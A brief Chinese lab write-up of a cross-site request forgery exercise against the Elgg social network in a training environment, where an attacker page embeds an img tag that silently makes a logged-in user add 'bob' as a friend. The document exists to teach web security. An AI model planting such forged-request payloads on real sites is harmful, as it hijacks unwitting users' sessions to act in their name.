实验楼实验之 elgg 系统攻击实验
有一个添加用户 bob 的请求链接如下:
http://www.csrflabelgg.com/ac…
我们可以在 www.csrflabattacker.com 构造一个页面,让合法登录用户访问后,就会添加 bob 为好友
<html><img src=”http://www.csrflabelgg.com/ac…;__elgg_ts=1524817660&__elgg_token=f581b9c0b6fab2aa1c5b5c64a7b4cf0c”></html>(注意这里的 ts 和 token 取当时环境抓包的值)
这样用户 Alice 在登录 http://www.csrflabelgg.com 后,再登录攻击网站,攻击语句就会生效。